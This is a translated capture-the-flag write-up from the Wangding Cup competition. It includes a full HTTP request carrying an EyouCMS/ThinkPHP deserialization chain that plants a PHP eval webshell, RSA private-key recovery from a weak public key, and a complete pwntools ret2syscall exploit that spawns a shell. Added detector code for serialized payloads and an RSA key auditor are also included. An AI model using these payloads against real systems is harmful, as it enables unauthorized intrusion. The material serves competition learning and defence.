Web
web01
Visiting the site shows it is running EyouCMS.
For an off-the-shelf CMS the bugs are usually historical vulnerabilities or recently (partly) disclosed ones, so search for them first:
https://n1k0la-t.github.io/2023/01/28/EyouCMS%20v1.6.1%200day%E6%8C%96%E6%8E%98/
A PoC article was found at https://cn-sec.com/archives/2640154.html
Enter the admin backend: visit login.php?m=Admin/login and log in with the weak credentials admin/admin.
Locate the vulnerable spot:
Create a new column and change the dtype parameter to region.
After saving, click edit again; the edit form now shows the id of that column. Click edit, enter the payload, and save the change:
POST /login.php?m=admin&c=Field&a=arctype_edit&_ajax=1&lang=cn HTTP/1.1
Host: xxx
Content-Length: 987
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Wayland like X11; FreeBSD; Linux x86_64; en-US; rv:131.0esr) Gecko/20160900 Firefox/131.0esr
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://xxx.com
Referer: http://xxxx.com/login.php?m=admin&c=Field&a=arctype_edit&id=546&lang=cn
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=2f61be676dee8f47f423fde9b3ef2e5d; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=switch_map%7CIndex
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
Connection: keep-alive
title=ceshi&name=ceshi&old_dtype=region&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=xxx&old_name=ceshi&dtype[]=region
Replace the id with the corresponding one; after the success prompt, visit
http://xxx.cn:45783/login.php?m=admin&c=Field&a=channel_edit&channel_id=-99&id=546&_ajax=1
If the response is a 500 with an error message, the chain fired.
The webshell path is a.php617ac73525b333bea4ac35a717dd8b0a.php
The flag is in the root directory:
wdflag{2wcsvp5uynpnxqxkpevu8k9wdds22vxb}
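The request above delivers a PHP serialized ThinkPHP object and a php://filter path inside an ordinary form field, which is exactly the kind of content a request-body inspection rule can catch. The following is an added example written for this write-up (it is not code from the original post or from EyouCMS): it percent-decodes each POST parameter and flags serialized PHP objects, the think\ namespace used by the gadget chain, and php:// stream wrappers. The sample requests are constructed; the first body is a shortened, non-functional stand-in for the dfvalue payload, not the payload itself.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Markers taken from the request above: a PHP serialized object (O:<len>:"<class>"),
# the ThinkPHP "think\" namespace of the gadget chain, and a php:// wrapper in a path.
# The patterns are applied to the percent-decoded parameter values.
PHP_OBJECT = re.compile(r'O:\d+:"[^"]*"')
THINK_NAMESPACE = re.compile(r'O:\d+:"think\\', re.IGNORECASE)
PHP_WRAPPER = re.compile(r'php://(?:filter|input|data)', re.IGNORECASE)


def inspect_body(body):
    """Return (parameter, reason) findings for one application/x-www-form-urlencoded body."""
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            decoded = unquote_plus(value)  # second decode catches a double-encoded payload
            if THINK_NAMESPACE.search(decoded):
                findings.append((name, "serialized ThinkPHP object"))
            elif PHP_OBJECT.search(decoded):
                findings.append((name, "serialized PHP object"))
            if PHP_WRAPPER.search(decoded):
                findings.append((name, "php:// stream wrapper"))
    return findings


# Constructed sample traffic (not captured from a real host). The first body is a
# shortened, non-working stand-in for the dfvalue payload above; the second is a
# normal column edit; the third carries a generic object plus a php://filter path.
SAMPLE_REQUESTS = [
    ("/login.php?m=admin&c=Field&a=arctype_edit&_ajax=1",
     "title=ceshi&name=ceshi&old_dtype=region"
     "&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A0%3A%7B%7D%7D"
     "&dtype%5B%5D=region"),
    ("/login.php?m=admin&c=Field&a=arctype_edit&_ajax=1",
     "title=news&name=news&old_dtype=text&dfvalue=1&dtype%5B%5D=text"),
    ("/login.php?m=admin&c=Field&a=arctype_edit&_ajax=1",
     "dfvalue=O%3A5%3A%22Other%22%3A0%3A%7B%7D&path=php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3Dx"),
]


def scan_requests(requests=SAMPLE_REQUESTS):
    """Return [(path, findings)] for every request whose body trips at least one rule."""
    hits = []
    for path, body in requests:
        findings = inspect_body(body)
        if findings:
            hits.append((path, findings))
    return hits


if __name__ == "__main__":
    for path, findings in scan_requests():
        print(path, findings)
```

The rule keys on the decoded value rather than the raw body because the serialized object arrives fully percent-encoded; an alert on the admin Field/arctype_edit endpoint that also carries a serialized object is a strong signal even when the login that preceded it looked legitimate.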
Web03
dirsearch turned up robots.txt.
Visiting it yields a bmp image plus a username and password.
A public key was obtained:
No other information could be found, so the guess is that the private key has to be recovered from the public key. Use the corresponding tool:
https://github.com/RsaCtfTool/RsaCtfTool
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=
python3 RsaCtfTool.py --publickey ./a.pub --private
This yields the private key.
Use the private key to log in over ssh.
Flag: wdflag{dtyg6g62z77ekx8ae23usuab2hgmn5qg}
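The step above recovers a private key from the public key alone, which is only possible when the key was generated badly. As an added example (not the original write-up's code and not part of RsaCtfTool), the Python below parses an OpenSSH ssh-rsa public key line into (e, n) and runs the cheap checks an operator can apply to their own keys before deployment: modulus size, even modulus, weak exponent, small prime factors, and a bounded Fermat test for primes that lie too close together. The key used in the test is constructed from two small primes so the example runs offline; MIN_MODULUS_BITS, FERMAT_ROUNDS and SMALL_PRIME_BOUND are assumed settings.

```python
import base64
import math
import struct

MIN_MODULUS_BITS = 2048   # assumed policy minimum
FERMAT_ROUNDS = 100       # assumed bound: catches p and q that are nearly equal
SMALL_PRIME_BOUND = 1000  # assumed trial-division bound


def _read_string(blob, offset):
    """Read one RFC 4251 'string' (uint32 big-endian length + bytes) from blob."""
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start = offset + 4
    if start + length > len(blob):
        raise ValueError("truncated key blob")
    return blob[start:start + length], start + length


def _string(data):
    return struct.pack(">I", len(data)) + data


def _mpint(x):
    """Encode a non-negative integer as an RFC 4251 mpint (leading 0x00 if high bit set)."""
    raw = x.to_bytes((x.bit_length() + 7) // 8, "big")
    if raw and raw[0] & 0x80:
        raw = b"\x00" + raw
    return _string(raw)


def encode_ssh_rsa(e, n):
    """Build an 'ssh-rsa AAAA...' line; used here to construct test keys."""
    blob = _string(b"ssh-rsa") + _mpint(e) + _mpint(n)
    return "ssh-rsa " + base64.b64encode(blob).decode("ascii")


def parse_ssh_rsa(line):
    """Return (e, n) from an OpenSSH ssh-rsa public key line."""
    parts = line.split()
    if len(parts) < 2 or parts[0] != "ssh-rsa":
        raise ValueError("not an ssh-rsa public key line")
    blob = base64.b64decode(parts[1])
    key_type, off = _read_string(blob, 0)
    if key_type != b"ssh-rsa":
        raise ValueError("blob key type does not match")
    e_bytes, off = _read_string(blob, off)
    n_bytes, off = _read_string(blob, off)
    if off != len(blob):
        raise ValueError("unexpected trailing data in key blob")
    return int.from_bytes(e_bytes, "big"), int.from_bytes(n_bytes, "big")


def _small_primes(bound):
    sieve = bytearray([1]) * bound
    sieve[0] = sieve[1] = 0
    for i in range(2, math.isqrt(bound) + 1):
        if sieve[i]:
            for j in range(i * i, bound, i):
                sieve[j] = 0
    return [i for i in range(bound) if sieve[i]]


def audit_rsa_public(e, n):
    """Return a list of human-readable issues; an empty list means nothing obvious was found."""
    issues = []
    bits = n.bit_length()
    if bits < MIN_MODULUS_BITS:
        issues.append(f"modulus is {bits} bits, below {MIN_MODULUS_BITS}")
    if n % 2 == 0:
        issues.append("modulus is even")
    if e < 3 or e % 2 == 0:
        issues.append(f"public exponent {e} is invalid or weak")
    for p in _small_primes(SMALL_PRIME_BOUND):
        if n % p == 0:
            issues.append(f"modulus has small prime factor {p}")
            break
    # Fermat: when p and q are close, a*a - n becomes a perfect square after few steps.
    a = math.isqrt(n)
    if a * a != n:
        a += 1
    for _ in range(FERMAT_ROUNDS):
        b2 = a * a - n
        b = math.isqrt(b2)
        if b * b == b2:
            if 1 < a - b < n:
                issues.append("prime factors are too close (Fermat factorization succeeds)")
            break
        a += 1
    return issues


def audit_key_line(line):
    return audit_rsa_public(*parse_ssh_rsa(line))


if __name__ == "__main__":
    # Constructed key from two adjacent small primes: both the size and the Fermat check fire.
    print(audit_key_line(encode_ssh_rsa(65537, 104723 * 104729)))
```

The same parse_ssh_rsa/audit_key_line pair can be run over an authorized_keys file line by line; any reported issue is a reason to rotate that key rather than to keep it in service.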
PWN2
Open the binary in IDA: p2 forks a child process that executes p1.
p1 prints the canary directly, but the read there cannot overflow.
p2 has no obvious exploitation point either.
However, the hide function contains a strcpy that can overflow, and fork is also called there, so the forked process has to be hijacked into running this function to get a shell.
So the plan is: hijack the fork in p1, reach the hide function and trigger the strcpy, which gives a shell.
from pwn import *
io = process('./wd')
#io = remote('',)
context(log_level='debug', arch='amd64')
# gadget addresses in the static binary
pop_rdi = 0x40213f
pop_rsi = 0x40a1ae
pop_rdx_rbx = 0x485feb
pop_rax = 0x450277
syscall = 0x41AC26
#leak canary (p1 prints it after ": ")
io.recvuntil(b": ")
canary = int(io.recvline(), 16)
io.recvline()
#jump hide
payload1 = b"a" * 0x28 + p32(1) + b"a" * 0x10
io.send(payload1)
io.recvline()
io.send(b"0")
io.recvline()
io.send(b"b" * 0x70)
io.recvline()
# strcpy overflow in hide(): both canary slots are rewritten with the leaked value
payload = b"a" * 0x64 + p32(0x11111111) + b"a" * 0x90 + p64(canary) + b"a" * 0x8 + p64(canary) + b"a" * 0x8
##ret2syscall: read(0, 0x4c5000, 8) to place "/bin/sh", then execve(0x4c5000, 0, 0)
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x4c5000) + p64(pop_rdx_rbx) + p64(0x8) + p64(0) + p64(pop_rax) + p64(0) + p64(syscall)
payload += p64(pop_rdi) + p64(0x4c5000) + p64(pop_rsi) + p64(0) + p64(pop_rdx_rbx) + p64(0) + p64(0) + p64(pop_rax) + p64(0x3b) + p64(syscall)
io.send(payload)
sleep(0.8)
io.send(b"/bin/sh\x00")
io.interactive()
Re2
Decompile the file with jadx: it contains a large number of encrypted strings and an AES key.
Try decrypting the ciphertexts with AES one by one; the flag ciphertext is eventually found.
Originally published on the WeChat public account TERRA星环安全团队: partial write-up for the Xuanwu group of the 4th "Wangding Cup" cybersecurity competition